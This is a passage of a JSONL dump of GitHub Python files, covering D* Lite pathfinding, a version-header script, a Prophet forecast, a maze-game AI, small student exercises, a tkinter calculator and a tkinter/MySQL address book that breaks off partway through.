print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(route2)\n return route2\n\n\ndef DStarLocal(graph, startVert, goalVert, percWrong=20):\n \"\"\"This algorithm search a graph using D* Lite for\n a path from some start to some goal. It simulates incorrect\n information about the world by modifying percWrong percent\n of the cells in the graph to have a different value. 
Then,\n after the first route is generated, the function determines when\n the route comes close to an incorrect value, and it feeds a small number of corrections at a time to DStarLite..\"\"\"\n if graph.__class__.__name__ != \"GridGraph\":\n print(\"DStarGlobal only works on Grid Graphs, try again.\")\n return\n correctInfo, incorrectGraph = corruptGraph(graph, percWrong)\n print(\"CORRUPTED GRAPH:\")\n dStarRunner = DStarAlgorithm(incorrectGraph, startVert, goalVert)\n print(\"First pass...\")\n t1 = time.time()\n route1 = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"First route found is:\")\n print(route1)\n print(\"Time elapsed:\", t2 - t1)\n # incorrectGraph.printWithRoute(route1)\n mapWid = graph.getWidth()\n mapHgt = graph.getHeight()\n for cell in route1:\n (r, c) = graph.getData(cell)\n badNeighbors = findIncorrectNeighbors(correctInfo, r, c, mapWid, mapHgt)\n if len(badNeighbors) > 0:\n print(\"Incorrect neighbors:\", badNeighbors)\n print(\"Correcting information...\")\n dStarRunner.correctInformation(badNeighbors)\n t1 = time.time()\n nextRoute = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"Fixed route found is:\")\n print(nextRoute)\n print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(nextRoute)\n return nextRoute\n\n\ndef findIncorrectNeighbors(correctInfo, row, col, wid, hgt):\n \"\"\"Takes in the dictionary of correct information, along\n with a row and column of a cell in the occupancy grid, and the size\n of the occupancy grid. It checks if any of the nine cells centered\n on row and col are incorrect. If so, they, along with the correct\n information, are added to the dictionary. That dictionary is returned.\"\"\"\n bads = {}\n for r in [row - 1, row, row + 1]:\n for c in [col - 1, col, col + 1]:\n if (r >= 0) and (r < wid) and (c >= 0) and (c < hgt):\n if (r, c) in correctInfo:\n bads[r, c] = correctInfo[r, c]\n del correctInfo[r, c]\n return bads\n\n\ndef corruptGraph(oldGraph, percWrong):\n \"\"\"Takes in an old grid graph and the percentage that should\n be modified, and returns a dictionary containing the correct\n values, so they can be fixed later, and a new graph with\n modified values.\"\"\"\n graph = oldGraph.copy()\n graphSize = graph.getSize()\n minC = oldGraph.getMinCost()\n maxC = oldGraph.getMaxCost()\n #print(\"minC =\", minC, \"maxC =\", maxC)\n correctInfo = {}\n for i in range(percWrong * graphSize // 100):\n randNode = random.randrange(graphSize)\n (randRow, randCol) = graph.getData(randNode)\n randVal = random.randint(minC, maxC)\n correctInfo[randRow, randCol] = graph.getCellValue(randRow, randCol)\n graph.setCellValue(randRow, randCol, randVal)\n graph.graphFromGrid()\n return correctInfo, graph\n","repo_name":"dletk/COMP380-Spring-2018","sub_path":"hw4/DStarLite.py","file_name":"DStarLite.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"72942468671","text":"#!/usr/bin/env python\n\nfrom create_header import do_replace\nimport optparse\nimport re\nimport string\nimport subprocess\nimport sys\n\n# for creating version.h\nGET_COMMIT_ID = 'git log --pretty=format:%H -1'\nVERSION_ID_KEY = '@LINEAR_VERSION_ID@'\nCOMMIT_ID_KEY = '@LINEAR_COMMIT_ID@'\n\n_usage = 'usage: %prog [options]'\n\n\ndef read_commit_id_and_version(ac, kv):\n try:\n proc = subprocess.Popen(GET_COMMIT_ID,\n stdout=subprocess.PIPE,\n shell=True)\n kv[COMMIT_ID_KEY] = proc.stdout.readlines()[0].decode('utf-8')\n except:\n 
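# git metadata is unavailable (e.g. building outside a checkout):\n # fall back to an empty commit id instead of failing\n 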
kv[COMMIT_ID_KEY] = \"\"\n\n with open(ac, 'r') as f:\n for line in f:\n inner = re.search('AC_INIT\\((.*)\\)', line)\n if not inner:\n continue\n r = re.findall('\\[(.+?)\\]', inner.group(1))\n kv[VERSION_ID_KEY] = r[0] + '-' + r[1]\n\n return kv\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(usage=_usage)\n parser.add_option('-c', '--configure_ac', dest='ac',\n help='configure.ac file', metavar='/path/to/configure.ac')\n parser.add_option('-i', '--input', dest='input',\n help='input file', metavar='/path/to/file_name')\n parser.add_option('-o', '--output', dest='output',\n help='output file', metavar='/path/to/file_name')\n (opts, args) = parser.parse_args()\n if not opts.ac:\n parser.error('you must specify configure.ac file')\n if not opts.input:\n parser.error('you must specify input file')\n if not opts.output:\n parser.error('you must specify output file')\n\n opts.replace = {\n VERSION_ID_KEY: 'package-version',\n COMMIT_ID_KEY: '-'\n }\n opts.replace = read_commit_id_and_version(opts.ac, opts.replace)\n sys.exit(do_replace(opts))\n","repo_name":"linear-rpc/linear-cpp","sub_path":"tools/create_version_h.py","file_name":"create_version_h.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"}
+{"seq_id":"9881765057","text":"# make an out-of-sample forecast\r\nfrom pandas import read_csv\r\nfrom pandas import to_datetime\r\nfrom pandas import DataFrame\r\nfrom fbprophet import Prophet\r\nfrom matplotlib import pyplot\r\n#import psycopg2\r\n#from sklearn.metrics import mean_absolute_error\r\n\r\n# load data\r\npath = \"D:/Projects/prophet/data.csv\"\r\ndf = read_csv(path, header=0)\r\n# prepare expected column names\r\ndf.columns = ['ds', 'y']\r\ndf['ds'] = to_datetime(df['ds'])\r\n\r\n# define the model\r\nmodel = Prophet()\r\n# fit the model\r\nmodel.fit(df)\r\n\r\n# keep only the dates after the cut-off for the out-of-sample forecast\r\nfuture = list()\r\na = \"2012-12-10\"\r\nfor index, row in df.iterrows():\r\n if str(row['ds']) > a:\r\n future.append(row['ds'])\r\n\r\nfuture = DataFrame(future)\r\nfuture.columns = ['ds']\r\nfuture['ds'] = to_datetime(future['ds'])\r\n# use the model to make a forecast\r\nforecast = model.predict(future)\r\n# summarize the forecast\r\nprint(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].head())\r\n# plot forecast\r\nmodel.plot(forecast)\r\npyplot.show()\r\n","repo_name":"DoctorKocte/prophet","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"31417240629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport lib.interface as interface\nimport lib.utils as u\nimport lib.algorithms as algo\n\nimport os\nfrom subprocess import check_output\nIAName = \"closest2\"\n\n\n(mazeWidth, mazeHeight, mazeMap, preparationTime, turnTime, playerLocation, opponentLocation, coins, gameIsOver) = interface.initGame(IAName)\nroute = []\nmazeMap[(-1, -1)] = ()\n\ndef next_way(playerLocation, coins):\n \"\"\"\n Run Dijkstra from the player's position, pick the closest\n remaining coin, remove it from the coin list and return the\n route towards it.\n \"\"\"\n candidates = algo.dijkstra(mazeMap, playerLocation)\n dist = float(\"inf\")\n coin = (-1,-1)\n for c in coins:\n if candidates[1][c] < dist:\n dist = candidates[1][c]\n coin = c\n coins.remove(coin)\n return u.way_width(candidates[0], playerLocation, coin)\n\ndef get_pid_en(name):\n \"\"\"\n 
Return the PIDs of all processes called name, excluding\n the current process itself.\n \"\"\"\n return [int(f) for f in check_output([\"pidof\", name]).split() if int(f) != os.getpid()]\n\n\n\ndef initialisationTurn(mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins):\n \"\"\"\n Called once during the preparation phase: compute the\n initial route towards the closest coin.\n \"\"\"\n global route\n\n route = next_way(playerLocation, coins)\n\n\ndef determineNextMove(playerLocation, opponentLocation, coins):\n \"\"\"\n Called at each turn: follow the current route, recomputing it\n when it is exhausted or when the opponent is closer to our\n target coin than we are.\n \"\"\"\n global route\n if len(route) == 0:\n route = next_way(playerLocation, coins)\n else:\n enemy_dists = algo.dijkstra(mazeMap, opponentLocation)\n if enemy_dists[1][route[-1]] < len(route):\n route = next_way(playerLocation, coins)\n next_pos = route.pop(0)\n return u.direction(playerLocation, next_pos)\n\n\n\n# Init our AI\ninitialisationTurn(mazeWidth, mazeHeight, mazeMap, preparationTime, playerLocation, opponentLocation, coins)\n\n# <>\n\n\n# Starts the game\ninterface.startGameMainLoop(determineNextMove)\nquit()","repo_name":"dimtion/jml","sub_path":"inputFiles/ourIA/closest2.py","file_name":"closest2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
+{"seq_id":"4966715329","text":"x=str(input(\"Enter the string:\"))\ndigit=0\nletter=0\nothers=0\nt=len(x)\nfor i in range(0,t):\n if x[i].isnumeric():\n digit += 1\n elif x[i].isalpha():\n letter+=1\n else:\n others+=1\nprint(others)\n","repo_name":"Subashini06/SUBA","sub_path":"countngsplchar.py","file_name":"countngsplchar.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"34738750406","text":"from gpiozero import *\nfrom time import sleep\nimport random\n\nplayer1_name = input('What is your name? ')\nprint ('Hello ' + player1_name +'!')\n\nplayer2_name = input('What is your name? 
')\nprint ('Hello ' + player2_name +'!')\n\nled = LED(18)\nplayer1 = Button (14)\nplayer2 = Button (25)\n\nled.on ()\nsleep (random.uniform(5,10))\nled.off ()\n\ndef pressed (button):\n if button.pin.number == 14:\n print (player1_name + ' Won the game')\n else:\n print (player2_name + ' Won the game')\n\nplayer1.when_pressed = pressed\nplayer2.when_pressed = pressed\n\n# wait for button presses; without this the script would exit immediately\nfrom signal import pause\npause()","repo_name":"RaspiKidd/QuickReactionGame","sub_path":"Python/quickReactionGame.py","file_name":"quickReactionGame.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"17404570480","text":"from tkinter import Tk, Button, Entry, END\n\n# main window configuration\nroot = Tk()\nroot.title(\"Calculadora POO\")\nroot.resizable(0,0)\nroot.geometry('280x250')\n\n# output display configuration\npantalla = Entry(root, width=22, bg=\"black\", fg=\"white\", borderwidth=0, font=(\"arial\", 18, \"bold\"))\npantalla.grid(row=0, column=0, columnspan=4, padx=1, pady=1)\n\n# event handlers\ningreso = \"\"\ndef botones(click):\n global ingreso # the accumulated expression lives at module level\n valor_ingresado = click.widget.cget(\"text\")\n pantalla.insert(END, valor_ingresado)\n ingreso += valor_ingresado\n\ndef operacion(click):\n if \"-\" in ingreso:\n numeros = ingreso.split(\"-\")\n result = float(numeros[0]) - float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"+\" in ingreso:\n numeros = ingreso.split(\"+\")\n result = float(numeros[0]) + float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"/\" in ingreso:\n numeros = ingreso.split(\"/\")\n result = float(numeros[0]) / float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"*\" in ingreso:\n numeros = ingreso.split(\"*\")\n result = float(numeros[0]) * float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n\n\n\n# button configuration: create each Button first and call grid() on a separate\n# line, because Button(...).grid(...) evaluates to None\nboton_1 = Button(root, text=\"1\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_1.grid(row=1, column=0, padx=1, pady=1)\nboton_1.bind(\"<Button-1>\", botones)\n\nboton_2 = Button(root, text=\"2\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_2.grid(row=1, column=1, padx=1, pady=1)\nboton_2.bind(\"<Button-1>\", botones)\n\nboton_3 = Button(root, text=\"3\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_3.grid(row=1, column=2, padx=1, pady=1)\nboton_3.bind(\"<Button-1>\", botones)\n\nboton_4 = Button(root, text=\"4\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_4.grid(row=2, column=0, padx=1, pady=1)\nboton_4.bind(\"<Button-1>\", botones)\n\nboton_5 = Button(root, text=\"5\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_5.grid(row=2, column=1, padx=1, pady=1)\nboton_5.bind(\"<Button-1>\", botones)\n\nboton_6 = Button(root, text=\"6\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_6.grid(row=2, column=2, padx=1, pady=1)\nboton_6.bind(\"<Button-1>\", botones)\n\nboton_7 = Button(root, text=\"7\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_7.grid(row=3, column=0, padx=1, pady=1)\nboton_7.bind(\"<Button-1>\", botones)\n\nboton_8 = Button(root, text=\"8\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_8.grid(row=3, column=1, padx=1, pady=1)\nboton_8.bind(\"<Button-1>\", botones)\n\nboton_9 = Button(root, text=\"9\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\")\nboton_9.grid(row=3, column=2, padx=1, pady=1)\nboton_9.bind(\"<Button-1>\", botones)\n\nboton_igual = Button(root, text=\"=\", width=20, height=3, bg=\"red\", fg=\"white\", borderwidth=0, cursor=\"hand2\")\nboton_igual.grid(row=4, column=0, columnspan=2, padx=1, pady=1)\nboton_igual.bind(\"<Button-1>\", operacion)\n\nboton_punto = Button(root, text=\".\", width=9, height=3, bg=\"spring green\", fg=\"black\", cursor=\"hand2\", borderwidth=0)\nboton_punto.grid(row=4, column=2, padx=1, pady=1)\nboton_punto.bind(\"<Button-1>\", botones)\n\nboton_mas = Button(root, text=\"+\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\")\nboton_mas.grid(row=1, column=3, padx=1, pady=1)\nboton_mas.bind(\"<Button-1>\", botones)\n\nboton_menos = Button(root, text=\"-\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\")\nboton_menos.grid(row=2, column=3, padx=1, pady=1)\nboton_menos.bind(\"<Button-1>\", botones)\n\nboton_multiplicacion = Button(root, text=\"*\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\")\nboton_multiplicacion.grid(row=3, column=3, padx=1, pady=1)\nboton_multiplicacion.bind(\"<Button-1>\", botones)\n\nboton_division = Button(root, text=\"/\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\")\nboton_division.grid(row=4, column=3, padx=1, pady=1)\nboton_division.bind(\"<Button-1>\", botones)\nroot.mainloop()\n\n\n","repo_name":"POO2023-01-UNALMED/taller-9-python-angomezz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"15259381626","text":"from __future__ import print_function\nfrom tkinter import *\nimport tkinter as ttk\nfrom tkinter import Tk\nfrom tkinter import messagebox\nfrom typing import List\nimport os.path\nimport numpy as np\n\nimport datetime\nimport mysql.connector\n\n\ncnx = mysql.connector.connect(user='pi', password='',\n host='192.168.2.100',\n database='adressbuch')\n\nclass Main:\n def __init__(self):\n\n # create the window\n main_win = Tk()\n main_win.title('Adressbuch')\n\n main_win.columnconfigure(0, weight=1)\n main_win.rowconfigure(0, weight=1)\n\n self.menue = Menue(main_win)\n\n main_win.mainloop()\n\n\nclass Menue(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n\n # create the menu frame\n menue_frame = ttk.Frame(borderwidth=2, width=200, height=150)\n\n # place the menu frame; grid_propagate(0) keeps its requested size\n menue_frame.grid_propagate(0)\n menue_frame.grid(sticky=(W + N + S + E))\n\n # let the frame's grid rows and column stretch\n menue_frame.columnconfigure(0, weight=1)\n menue_frame.rowconfigure(0, weight=1)\n menue_frame.rowconfigure(1, weight=1)\n menue_frame.rowconfigure(2, weight=1)\n menue_frame.rowconfigure(3, weight=1)\n\n # create the buttons\n hinzufuegen_button = ttk.Button(menue_frame, text=\"Hinzufügen\", command=lambda: hinzufügen(parent), width=10)\n abrufen_button = ttk.Button(menue_frame, text=\"Abrufen\", command=lambda: abfragen(parent), width=10)\n alleAbrufen_button = ttk.Button(menue_frame, text=\"Alle Abrufen\", command=lambda: alleAbfragen(parent), width=10)\n\n # create the label\n adressbuch = Label(menue_frame, text=\"Adressbuch\", font=(\"Helvetica\", 16))\n\n # arrange the widgets\n adressbuch.grid(column=0, row=0)\n hinzufuegen_button.grid(column=0, row=1)\n abrufen_button.grid(column=0, row=2)\n alleAbrufen_button.grid(column=0, row=3)\n\n\nclass Mask(ttk.Frame):\n def __init__(self, parent, number=False):\n self.dict = {}\n self.parent = parent\n # create the frame\n 
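# Mask is the shared entry form; with number=True it additionally\n # shows a record-number field (used by the search dialog below)\n 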
super().__init__(parent)\n self.columnconfigure(1, weight=1)\n self.grid(column=0, row=0, sticky=(W + N + S + E))\n\n # erstellen und einfügen der Labels\n VornameLabel = ttk.Label(self, text=\"Vorname\")\n NachnameLabel = ttk.Label(self, text=\"Nachname\")\n StraßeLabel = ttk.Label(self, text=\"Straße\")\n HausNrLabel = ttk.Label(self, text=\"Hausnummer\")\n OrtLabel = ttk.Label(self, text=\"Ort\")\n PLZLabel = ttk.Label(self, text=\"Postleitzahl\")\n LandLabel = ttk.Label(self, text=\"Land\")\n birthdateDayLabel = ttk.Label(self, text=\"Geburtstag\")\n birthdateMonthLabel = ttk.Label(self, text=\"Geburtsmonat\")\n birthdateYearLabel = ttk.Label(self, text=\"Geburtsjahr\")\n\n VornameLabel.grid(column=0, row=1)\n NachnameLabel.grid(column=0, row=2)\n StraßeLabel.grid(column=0, row=3)\n HausNrLabel.grid(column=0, row=4)\n OrtLabel.grid(column=0, row=5)\n PLZLabel.grid(column=0, row=6)\n LandLabel.grid(column=0, row=7)\n birthdateDayLabel.grid(column=0, row=8)\n birthdateMonthLabel.grid(column=0, row=9)\n birthdateYearLabel.grid(column=0, row=10)\n\n # erstellen und einfügen der Entrys zu den jeweiligen Labels\n self.VornameEntry = ttk.Entry(self)\n self.NachnameEntry = ttk.Entry(self)\n self.StraßeEntry = ttk.Entry(self)\n self.HausNrEntry = ttk.Entry(self)\n self.OrtEntry = ttk.Entry(self)\n self.PLZEntry = ttk.Entry(self)\n self.LandEntry = ttk.Entry(self)\n self.birthdateDayEntry = ttk.Entry(self)\n self.birthdateMonthEntry = ttk.Entry(self)\n self.birthdateYearEntry = ttk.Entry(self)\n\n self.VornameEntry.grid(column=1, row=1)\n self.VornameEntry.focus()\n self.NachnameEntry.grid(column=1, row=2)\n self.StraßeEntry.grid(column=1, row=3)\n self.HausNrEntry.grid(column=1, row=4)\n self.OrtEntry.grid(column=1, row=5)\n self.PLZEntry.grid(column=1, row=6)\n self.LandEntry.grid(column=1, row=7)\n self.birthdateDayEntry.grid(column=1, row=8)\n self.birthdateMonthEntry.grid(column=1, row=9)\n self.birthdateYearEntry.grid(column=1, row=10)\n\n # Nummer wird nur auf anfrage beim Aufruf erstellt\n if number == True:\n NummerLabel = ttk.Label(self, text=\"Nummer\")\n self.NummerEntry = ttk.Entry(self)\n self.NummerEntry.grid(column=1, row=11)\n NummerLabel.grid(column=0, row=11)\n\n def collect(self, number=False, checkForCompleteDate=False):\n \"\"\"\n\n :type number: boolean\n \"\"\"\n is_empty = True\n\n self.dict.clear()\n\n # Einsammeln der Einträge in ein dict wenn kein Wert vorhanden Wert = None\n if self.VornameEntry.get():\n self.dict['Vorname'] = self.VornameEntry.get()\n is_empty = False\n else:\n self.dict['Vorname'] = None\n if self.NachnameEntry.get():\n is_empty = False\n self.dict['Nachname'] = self.NachnameEntry.get()\n else:\n self.dict['Nachname'] = None\n if self.StraßeEntry.get():\n is_empty = False\n self.dict['Straße'] = self.StraßeEntry.get()\n else:\n self.dict['Straße'] = None\n if self.HausNrEntry.get():\n is_empty = False\n self.dict['HausNr'] = self.HausNrEntry.get()\n else:\n self.dict['HausNr'] = None\n if self.OrtEntry.get():\n is_empty = False\n self.dict['Ort'] = self.OrtEntry.get()\n else:\n self.dict['Ort'] = None\n if self.PLZEntry.get():\n is_empty = False\n self.dict['PLZ'] = self.PLZEntry.get()\n else:\n self.dict['PLZ'] = None\n if self.LandEntry.get():\n is_empty = False\n self.dict['Land'] = self.LandEntry.get()\n else:\n self.dict['Land'] = None\n if self.birthdateYearEntry.get():\n is_empty = False\n self.dict['birthdateYear'] = self.birthdateYearEntry.get()\n else:\n self.dict['birthdateYear'] = None\n if self.birthdateMonthEntry.get():\n is_empty = 
False\n self.dict['birthdateMonth'] = self.birthdateMonthEntry.get()\n else:\n self.dict['birthdateMonth'] = None\n if self.birthdateDayEntry.get():\n is_empty = False\n self.dict['birthdateDay'] = self.birthdateDayEntry.get()\n else:\n self.dict['birthdateDay'] = None\n\n # einsammmeln der Nummer nur wenn Nummer mit angegeben\n if number:\n if self.NummerEntry.get():\n self.dict['Nummer'] = self.NummerEntry.get()\n is_empty = False\n else:\n self.dict['Nummer'] = None\n\n if checkForCompleteDate is True:\n if self.birthdateYearEntry.get() and (not self.birthdateMonthEntry.get() or not self.birthdateDayEntry.get()):\n return 1\n elif self.birthdateMonthEntry.get() and (not self.birthdateYearEntry.get() or not self.birthdateDayEntry.get()):\n return 1\n elif self.birthdateDayEntry.get() and (not self.birthdateYearEntry.get() or not self.birthdateMonthEntry.get()):\n return 1\n if is_empty is True:\n return None\n else:\n return self.dict\n\n\nclass hinzufügen():\n def __init__(self, parent):\n mask = Mask(parent, False)\n\n ttk.Button(mask, text='Ausführen', command=(\n lambda: (insert(mask.collect(False)) if mask.collect(False, True) is not None and mask.collect(False, True) is not 1 else (\n messageboxes.incomplete_birthdate() if mask.collect(False, True) is 1 else messageboxes.no_entry_in_mask()),mask.destroy(), hinzufügen(parent))),\n width=10).grid(\n column=1, row=11)\n ttk.Button(mask, text=\"zurück\", command=mask.destroy, width=10).grid(\n column=0, row=11)\n\n\nclass abfragen():\n def __init__(self, parent):\n mask = Mask(parent, True)\n ausführen = ttk.Button(mask, text='Ausführen', command=lambda: display_entry(parent, self.search(mask.collect(True))) if mask.collect(True, False) is not None and self.search(mask.collect(True)) else (messageboxes.no_entry_in_mask() if mask.collect(True, False) is None else messageboxes.no_entry_in_DB()),\n width=10)\n ausführen.grid(column=1, row=12)\n ttk.Button(mask, text=\"zurück\", command=mask.destroy, width=10).grid(\n column=0, row=12)\n\n def search(self, dict):\n\n\n cursor = cnx.cursor()\n sql_and_data = make_get_and_data_sql(dict)\n\n\n cursor.execute(list(sql_and_data)[0], list(sql_and_data)[1])\n result = cursor.fetchall()\n result_list = []\n for x in result:\n result_list.extend(list(x))\n cnx.commit()\n return result_list\n\nclass alleAbfragen():\n def __init__(self, parent):\n list\n display_entry(parent, self.get_data())\n\n\n\n\n def get_data(self):\n cursor = cnx.cursor()\n\n cursor.execute(\"SELECT * FROM `adressbuch`\")\n result = cursor.fetchall()\n result_list = []\n for x in result:\n result_list.extend(list(x))\n cnx.commit()\n return result_list\n\n\n\nclass display_entry(ttk.Frame):\n def __init__(self, parent, list):\n super().__init__(parent)\n self.grid(column=0, row=0, sticky=(W + N + S + E))\n\n list = np.array(list).reshape(int(len(list) / 9), 9).tolist()\n\n display_entry_frames = []\n for x in range(len(list)):\n display_entry_frames.append(display_entry_frame(self, list[x]))\n\n self.current_page = 0\n menue_bar_frame = ttk.Frame(self)\n vor_button = ttk.Button(menue_bar_frame, text=\">\", command=lambda: update_page(False))\n zurueck_button = ttk.Button(menue_bar_frame, text=\"<\", command=lambda: update_page(True))\n buffer_label = ttk.Label(menue_bar_frame, text=\"sample\")\n vor_button.grid(column=2, row=0)\n zurueck_button.grid(column=0, row=0)\n buffer_label.grid(column=1, row=0)\n menue_bar_frame.grid(column=0, row=0)\n display_entry_frames[self.current_page].grid(column=0, row=1)\n ttk.Button(self, 
text=\"Zurück\", command=self.destroy, width=10).grid(\n column=0, row=3)\n ttk.Button(self, text=\"Aktualisieren \", command=lambda: (parent.destroy(), Main(), sys.exit) if updat_entry(\n display_entry_frames[self.current_page].mask, True) is None else None, width=10).grid(\n column=1, row=3)\n ttk.Button(self, text=\"Löschen\", command=lambda: (parent.destroy(), Main(), sys.exit) if delete_entry(display_entry_frames[self.current_page].mask.collect(True)['Nummer']) is None else None, width=10).grid(\n column=2, row=3)\n\n def update_page(minus):\n if len(list) is not 1:\n display_entry_frames[self.current_page].grid_forget()\n if minus:\n self.current_page = (self.current_page - 1) % (len(list))\n else:\n self.current_page = (self.current_page + 1) % (len(list))\n\n display_entry_frames[self.current_page].grid(column=0, row=1)\n\n\nclass display_entry_frame(ttk.Frame):\n def __init__(self, parent, list):\n super().__init__(parent)\n self.mask = Mask(self, True)\n self.fillup_None(list)\n self.insert_text(self.mask, list)\n\n def insert_text(self, mask, list):\n mask.VornameEntry.insert(0, str(list[0]))\n mask.NachnameEntry.insert(0, str(list[1]))\n mask.StraßeEntry.insert(0, str(list[2]))\n mask.HausNrEntry.insert(0, str(list[3]))\n mask.OrtEntry.insert(0, str(list[4]))\n mask.PLZEntry.insert(0, str(list[5]))\n mask.LandEntry.insert(0, str(list[6]))\n if str(list[7]) is not '-':\n temp = str(list[7]).split('-')\n else:\n temp = ['-', '-', '-']\n mask.birthdateDayEntry.insert(0, temp[2])\n mask.birthdateMonthEntry.insert(0, temp[1])\n mask.birthdateYearEntry.insert(0, temp[0])\n mask.NummerEntry.grid_forget()\n NummerLabelDisplay = ttk.Label(mask, text=str(list[8]))\n NummerLabelDisplay.grid(column=1, row=11)\n mask.NummerEntry.insert(0, str(list[8]))\n\n def fillup_None(self, list):\n for x in range(len(list)):\n if list[x] is None:\n list[x] = \"-\"\n\n\nclass messageboxes():\n\n @staticmethod\n def incomplete_birthdate():\n messagebox.showerror(\"Error\", \"Sie haben nur Teile des Geburtsdatums angegeben. Bitte vervollständigen sie es.\")\n\n @staticmethod\n def no_entry_in_mask():\n messagebox.showerror(\"Error\", \"Sie haben keinen Wert eingegeben. 
Bitte versuchen sie es erneut.\")\n\n    @staticmethod\n    def no_entry_in_DB():\n        messagebox.showerror(\"Error\", \"Ihr angeforderter Eintrag existiert nicht\")\n\n    @staticmethod\n    def entry_updated():\n        messagebox.showinfo(\"Updated\", \"Eintrag erfolgreich aktualisiert\")\n\ndef insert(dict, withNumber=False):\n    cursor = cnx.cursor()\n    if withNumber is True:\n        add = (\n            \"INSERT INTO `adressbuch` (`Vorname`, `Nachname`, `Straße`, `HausNr`, `Ort`, `PLZ`, `Land`, `birthdate`, `Nummer`)\"\n            \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\")\n\n        data = [(dict['Vorname'], dict['Nachname'], dict['Straße'], dict['HausNr'], dict['Ort'], dict['PLZ'],\n                 dict['Land'], make_date(dict), dict['Nummer'])]\n\n    else:\n        add = (\n            \"INSERT INTO `adressbuch` (`Vorname`, `Nachname`, `Straße`, `HausNr`, `Ort`, `PLZ`, `Land`, `birthdate`)\"\n            \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\")\n\n        data = [(dict['Vorname'], dict['Nachname'], dict['Straße'], dict['HausNr'], dict['Ort'], dict['PLZ'],\n                 dict['Land'], make_date(dict))]\n\n    cursor.executemany(add, data)\n    cnx.commit()\n\n\ndef make_date(dict):\n    # Assemble a YYYY-MM-DD string; missing parts are padded with '0000'/'00',\n    # and None is returned only when no date part was entered at all\n    year = dict['birthdateYear']\n    month = dict['birthdateMonth']\n    day = dict['birthdateDay']\n\n    if year is None and month is None and day is None:\n        return None\n    return (year or '0000') + \"-\" + (month or '00') + \"-\" + (day or '00')\n\n\ndef updat_entry(mask, withNumber=False):\n\n    dict = mask.collect(withNumber)\n    for x in dict:\n        if dict[x] == '-':\n            dict[x] = None\n\n    # delete_entry() takes only the record number and opens its own cursor\n    delete_entry(dict['Nummer'])\n    insert(dict, True)\n    messageboxes.entry_updated()\n\ndef delete_entry(nummer):\n\n    cursor = cnx.cursor()\n    delete = \"DELETE FROM `adressbuch` WHERE (Nummer = %s)\"\n    data = (nummer,)\n\n    cursor.execute(delete, data)\n    cnx.commit()\n\ndef make_get_and_data_sql(dict):\n    vorgaenger = False\n    get = \"SELECT * FROM `adressbuch` \"\n\n    if dict['Vorname'] is not None and vorgaenger is False:\n        get += \" WHERE Vorname = %s\"\n        data = (dict['Vorname'],)\n        vorgaenger = True\n    if dict['Nachname'] is not None and vorgaenger is False:\n        get += \" WHERE Nachname = %s\"\n        data = (dict['Nachname'],)\n        vorgaenger = True\n    elif dict['Nachname'] is not None and vorgaenger is not False:\n        get += \" and Nachname = %s\"\n        li = list(data)\n        li.append(dict['Nachname'])\n        data = tuple(li)\n    if dict['Straße'] is not None and vorgaenger is False:\n        get += \" WHERE Straße = %s\"\n        data = (dict['Straße'],)\n        vorgaenger = True\n    elif dict['Straße'] is not None and vorgaenger is not False:\n        get += \" and Straße = %s\"\n        li = list(data)\n        li.append(dict['Straße'])\n        data = tuple(li)\n    if dict['HausNr'] is not None and vorgaenger is False:\n        get += \" WHERE HausNr = %s\"\n        data = (dict['HausNr'],)\n        vorgaenger = True\n    elif dict['HausNr'] is not None and vorgaenger is not False:\n        get += \" and HausNr = 
